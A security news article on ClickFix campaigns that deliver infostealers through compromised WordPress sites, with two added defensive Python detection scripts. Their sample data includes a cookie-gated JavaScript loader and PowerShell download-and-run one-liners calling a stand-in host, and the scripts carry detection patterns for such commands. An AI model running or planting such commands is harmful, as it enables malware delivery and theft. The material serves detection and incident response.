Cybercriminals are combining compromised websites with increasingly sophisticated ClickFix social engineering lures to deliver new infostealer malware, with one campaign alone weaponizing more than 250 WordPress sites across 12 countries.
The campaign leads to stealthy in-memory payloads, while a separate attack detected by Microsoft targets Windows Terminal for payload execution instead of the traditional Run dialog.
The WordPress campaign has been active since December 2025 and targets visitors with fake Cloudflare CAPTCHA challenges, researchers from security firm Rapid7 revealed in a report this week. The compromised WordPress websites span regional news outlets, local business websites, and even a US Senate candidate’s official webpage.
“The large-scale execution of the compromise across completely unrelated WordPress instances suggests a high level of automation by the threat actor and is likely part of an organized long-term criminal effort,” the researchers said.
Detection evasion
The WordPress ClickFix campaign delivers three separate infostealer payloads, two of them previously unknown, and uses domain infrastructure that appears to have been in place since July 2025.
The attackers disguise their injected JavaScript snippet as a performance optimizer that triggers only if the visitor’s browser does not carry a WordPress login cookie, which a logged-in administrator’s browser would. This check is intended to hide the malicious behavior from the people most likely to notice it: the site’s own administrators.
The script fetches a fake Cloudflare CAPTCHA verification challenge from one of 14 attacker-controlled domains, all resolving to a single IP address. The fake CAPTCHA instructs visitors to copy a command and paste it into the Windows Run dialog.
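The cookie gate described above is easy to check for from the outside, but only from a session that is not logged in. The following is an added example, not Rapid7’s code and not the campaign’s actual snippet: it parses a page’s HTML, collects inline scripts, and flags those that both bail out when a WordPress login cookie is present and pull further code from a host that is not the site itself. The sample page, the loader script, the site name example-news-site.test and the domains tag-manager.example and captcha-verify.example are all constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# WordPress sets wordpress_logged_in_<hash> (and wordpress_sec_<hash> over HTTPS)
# for authenticated users; a loader that bails out when it sees them stays
# invisible to the administrators most likely to notice it.
ADMIN_COOKIE_RE = re.compile(r"wordpress_(?:logged_in|sec)_", re.I)
# Any absolute URL referenced from an inline script.
URL_RE = re.compile(r"https?://[^'\"\s)<>]+", re.I)
# Wording a fake verification page tends to carry (a heuristic, not an IOC).
LURE_RE = re.compile(r"cloudflare|captcha|verify you are human|clipboard", re.I)


class ScriptCollector(HTMLParser):
    """Collect inline <script> bodies; scripts with a src attribute are listed separately."""

    def __init__(self):
        super().__init__()
        self.inline, self.external = [], []
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def is_foreign(url, site_host):
    """True when the URL's host is neither the site nor one of its subdomains."""
    host = (urlparse(url).hostname or "").lower()
    return bool(host) and host != site_host and not host.endswith("." + site_host)


def scan_html(html, site_host):
    """Return findings for inline scripts that gate on a WP login cookie AND load from a foreign host."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for body in parser.inline:
        gated = bool(ADMIN_COOKIE_RE.search(body))
        foreign = sorted({urlparse(u).hostname for u in URL_RE.findall(body) if is_foreign(u, site_host)})
        if gated and foreign:  # the combination is the signal; either alone is common on real sites
            findings.append({
                "gated_on_admin_cookie": gated,
                "remote_hosts": foreign,
                "lure_words": sorted({m.lower() for m in LURE_RE.findall(body)}),
                "snippet": " ".join(body.split())[:90],
            })
    return findings


# Constructed page for the fictional site example-news-site.test. The second
# inline script mimics the gated loader described in the article; the hosts are made up.
SAMPLE_HTML = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script>
  /* ordinary tag loader: foreign host but no cookie gate, so it is not flagged */
  var t = document.createElement('script'); t.src = 'https://tag-manager.example/gtag.js';
  document.head.appendChild(t);
</script>
<script>
  /* "performance optimizer" */
  (function () {
    if (document.cookie.indexOf('wordpress_logged_in_') !== -1) { return; }
    var s = document.createElement('script');
    s.src = 'https://captcha-verify.example/cf/challenge.js';
    document.head.appendChild(s);
  })();
</script>
</head><body><p>Regional news</p></body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML, "example-news-site.test"):
        print(finding)
```

Run it over HTML fetched from a logged-out session (curl, or a private browser window), never from the admin’s own logged-in browser: by design the injected code does nothing when the login cookie is present, so the page an administrator sees is clean. Any inline script that inspects `wordpress_logged_in_` at all is worth reading, since legitimate front-end code rarely has a reason to.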
The rogue command consists of obfuscated JavaScript and PowerShell code that launches an in-memory shellcode loader dubbed DoubleDonut Loader. The loader injects payloads directly into legitimate Windows processes and uses reflective code loading, so the final stages never need to touch disk as ordinary executables.
“The malware chain is executed almost entirely in memory and in the context of inconspicuous Windows processes, making traditional file-based detection ineffective,” Rapid7 wrote.
The compromised sites did not share the same vulnerable WordPress version or plugin, suggesting that the attackers are abusing weak or stolen credentials, exploiting several different vulnerabilities, or both.
New payloads
The DoubleDonut Loader was observed delivering a new variant of Vidar Stealer, a well-known infostealer. The variant uses a dead-drop resolver (a command-and-control address parked on a legitimate public service) to retrieve its C2 configuration, and resolves the Windows API functions it needs dynamically at runtime rather than importing them statically.
In addition to Vidar, two previously undocumented infostealers were observed, one written in .NET and one in C++. Rapid7 has named them Impure Stealer and VodkaStealer. Both use detection evasion techniques, including non-standard data encoding and symmetric encryption of command-and-control traffic, and sandbox detection based on system and timing checks.
ClickFix is a growing threat
In addition to new payloads, attackers are also evolving their ClickFix lures. A separate campaign identified by Microsoft’s Threat Intelligence team replaced the common Windows Run dialog (Win+R) with the Windows Terminal app, opened from the Win+X menu, for command execution.
That campaign delivered the well-known Lumma Stealer and NetSupport RAT. A second payload involved a VBScript chain executed through MSBuild that used EtherHiding, a technique that stages payloads in smart contracts on a public blockchain, to download credential harvesting code.
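The switch from the Run dialog to Windows Terminal matters for responders because the two leave different traces: commands entered in the Run dialog are recorded under the RunMRU registry key, while commands typed into an interactive PowerShell session (what Windows Terminal opens by default) land in PSReadLine’s ConsoleHost_history.txt and never appear in RunMRU. The following is an added example, not Microsoft’s or Rapid7’s code: a triage script that reads both artifacts, applies generic ClickFix heuristics (these are not the campaigns’ indicators; use the published IOCs for those) and reports commands that match. The RunMRU export, the history lines and the host captcha-verify.example are constructed; the live collection path assumes the default PSReadLine history location.

```python
import os
import re
import sys

# Generic markers for the kind of one-liner a ClickFix lure asks the victim to run.
HEURISTICS = [
    ("powershell_host", re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)),
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("policy_bypass", re.compile(r"-(ep|executionpolicy)\s+bypass\b", re.I)),
    ("lolbin", re.compile(r"\b(mshta|msbuild|wscript|cscript|certutil|bitsadmin|regsvr32|rundll32)(\.exe)?\b", re.I)),
    ("remote_url", re.compile(r"https?://", re.I)),
]
# "download and run" is order-independent: both "iex (irm ...)" and "irm ... | iex" count.
DOWNLOAD_RE = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b", re.I)
EXEC_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
# At least one of these must be present for a command to count as suspicious.
EXEC_SIGNALS = {"powershell_host", "lolbin", "download_and_run", "encoded_command"}


def classify(command):
    """Return the names of all heuristics the command matches."""
    hits = [name for name, rx in HEURISTICS if rx.search(command)]
    if DOWNLOAD_RE.search(command) and EXEC_RE.search(command):
        hits.append("download_and_run")
    return hits


def is_suspicious(hits):
    # Two independent markers, one of which is an execution primitive; a lone
    # "powershell" typed into Run by an admin does not qualify.
    return len(hits) >= 2 and bool(EXEC_SIGNALS & set(hits))


def parse_runmru(values):
    """RunMRU stores one command per letter-named value, each ending in '\\1';
    the MRUList value lists the letters most-recent-first."""
    commands = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        commands.append(raw[:-2] if raw.endswith("\\1") else raw)
    return commands


def triage(runmru_values, history_lines):
    findings = []
    for cmd in parse_runmru(runmru_values):
        hits = classify(cmd)
        if is_suspicious(hits):
            findings.append({"source": "RunMRU", "command": cmd, "hits": hits})
    for n, line in enumerate(history_lines, 1):
        hits = classify(line)
        if is_suspicious(hits):
            findings.append({"source": f"ConsoleHost_history:{n}", "command": line, "hits": hits})
    return findings


def collect_live():
    """On a Windows host, read the real artifacts for the current user (assumed default paths)."""
    import winreg
    values = {}
    key_path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, key_path) as key:
        i = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, i)
            except OSError:
                break
            values[name] = data
            i += 1
    history = os.path.join(os.environ["APPDATA"], "Microsoft", "Windows",
                           "PowerShell", "PSReadLine", "ConsoleHost_history.txt")
    with open(history, encoding="utf-8", errors="replace") as fh:
        lines = [ln.rstrip("\n") for ln in fh]
    return values, lines


# Constructed sample: a RunMRU export (value name -> data as regedit shows it)
# and a few PSReadLine history lines. Only entry "c" and history line 3 are bad.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "calc\\1",
    "c": 'powershell -w hidden -nop -ep bypass -c "iex (irm https://captcha-verify.example/v)"\\1',
}
SAMPLE_HISTORY = [
    "Get-ChildItem",
    "Set-Location C:\\Users\\alice",
    "iex (iwr -UseBasicParsing https://captcha-verify.example/t).Content",
    "Get-Process",
]

if __name__ == "__main__":
    live = sys.platform == "win32" and "--live" in sys.argv
    values, lines = collect_live() if live else (SAMPLE_RUNMRU, SAMPLE_HISTORY)
    for finding in triage(values, lines):
        print(f"[{finding['source']}] {finding['command']}\n    hits: {', '.join(finding['hits'])}")
```

Run with `--live` on the affected user’s profile to read the real registry key and history file; without it the script runs against the constructed sample. Note the coverage gap the Terminal variant exploits: a command pasted into Windows Terminal is not in RunMRU, so a triage playbook that only checks that key will miss it, and a `powershell -Command` one-liner launched from the Run dialog is not interactive, so it does not reach ConsoleHost_history.txt either. Both artifacts need to be pulled, and both are trivially deleted by the user, so treat their absence as inconclusive.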
Security firm ESET estimated that ClickFix attacks surged 517% last year, with multiple variations dubbed CrashFix, ConsentFix, and PhantomCaptcha, each with different lures and delivery mechanisms.
This basic social engineering tactic has proved so effective that even nation-state groups such as North Korea’s Lazarus group, Iran’s MuddyWater, and Russia’s APT28 have adopted it. In January, researchers from Sekoia reported that a separate ClickFix framework dubbed IClickFix had been injected into over 3,800 WordPress sites since 2024.
WordPress site operators should ensure their admin login panels (wp-login.php and the /wp-admin/ path) are not publicly exposed, for example by restricting them to known IP ranges or placing them behind an additional authentication layer, since Rapid7 noted that nearly all sites compromised in the campaign it discovered had accessible admin pages.
Rapid7 published indicators of compromise and YARA detection rules on its public GitHub repository.